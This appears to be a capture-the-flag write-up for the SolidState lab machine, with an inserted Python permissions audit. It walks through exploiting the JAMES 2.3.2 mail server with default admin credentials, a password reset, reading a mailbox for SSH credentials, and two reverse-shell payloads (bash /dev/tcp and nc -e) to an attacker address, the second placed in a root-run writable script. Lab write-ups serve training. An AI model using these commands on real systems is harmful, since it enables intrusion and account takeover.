Service overview

$ nmapAutomator.sh -H 10.10.10.51 -t Full
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.6 [10.10.14.6]),
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
| fingerprint-strings:
|   GenericLines:
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for
|_    Login id:
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Public exploit

searchsploit james => 35513.py

Change the payload in the exploit to /bin/bash -i >& /dev/tcp/10.10.14.6/1234 0>&1.

$ telnet 10.10.10.51 4555
root:root
$ listusers
user: james
user: thomas
user: john
user: mindy
user: mailadmin
$ setpassword mindy 1234
python 35513.py 10.10.10.51
nc -lnvp 1234

Check the POP3 mailbox of user mindy.

telnet 10.10.10.51 110
USER mindy
PASS 1234
LIST
RETR 2

=> this yields the SSH credentials mindy:P@55W0rd1!2@.

Restricted shell

ssh mindy@10.10.10.51 => catch the reverse shell with nc -lnvp 1234

User flag

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ip addr
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:cd:0b brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:cd0b/64 scope global mngtmpaddr dynamic
       valid_lft 86166sec preferred_lft 14166sec
    inet6 fe80::250:56ff:feb9:cd0b/64 scope link
       valid_lft forever preferred_lft forever
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
cat user.txt
0510e71c2e8c9cb333b36a38080d0dc2

linenum.sh

=> /opt/tmp.py looks like a script that is run periodically and calls os.system():

nc -lnvp 1235

Write the payload into /opt/tmp.py => os.system("nc -e /bin/bash 10.10.14.6 1235").
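The root vector here is a script executed by a privileged job that a low-privileged user can edit. The following Python audit is an added defender-side check, not part of the original writeup: it flags scripts whose permissions, ownership or parent directory let a non-root user alter them. The fixture it builds in a temp directory is constructed, and the names tmp.py and safe.py are assumptions.

```python
import os
import stat
import tempfile


def script_issues(path: str) -> list:
    """Explain why a lower-privileged user could alter a script that a
    privileged job (such as a root cron entry) executes."""
    issues = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        issues.append("symlink: target can be swapped by whoever controls the link")
        st = os.stat(path)  # follow the link for the remaining checks
    mode = st.st_mode
    if mode & stat.S_IWOTH:
        issues.append("world-writable")
    if mode & stat.S_IWGRP and st.st_gid != 0:
        issues.append("group-writable by a non-root group")
    if st.st_uid != 0:
        issues.append(f"owned by uid {st.st_uid}, not root")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        issues.append("parent directory world-writable without sticky bit (file can be replaced)")
    return issues


def audit(paths) -> dict:
    """Map each existing path to its list of findings (empty list = no issue)."""
    return {p: script_issues(p) for p in paths if os.path.lexists(p)}


def build_fixture():
    """Constructed sample: two scripts in a temp dir, one lax (0777) like
    the writeup's /opt/tmp.py and one with sane permissions (0755)."""
    d = tempfile.mkdtemp()
    lax = os.path.join(d, "tmp.py")
    ok = os.path.join(d, "safe.py")
    for p in (lax, ok):
        with open(p, "w") as f:
            f.write("import os\nos.system('echo job')\n")
    os.chmod(lax, 0o777)
    os.chmod(ok, 0o755)
    return lax, ok


if __name__ == "__main__":
    for p, found in audit(build_fixture()).items():
        print(p, "->", found or ["no issues"])
```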

Root flag

$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:cd:0b brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:cd0b/64 scope global mngtmpaddr dynamic
       valid_lft 86081sec preferred_lft 14081sec
    inet6 fe80::250:56ff:feb9:cd0b/64 scope link
       valid_lft forever preferred_lft forever
$ cat root.txt
4f4afb55463c3bc79ab1e906b074953d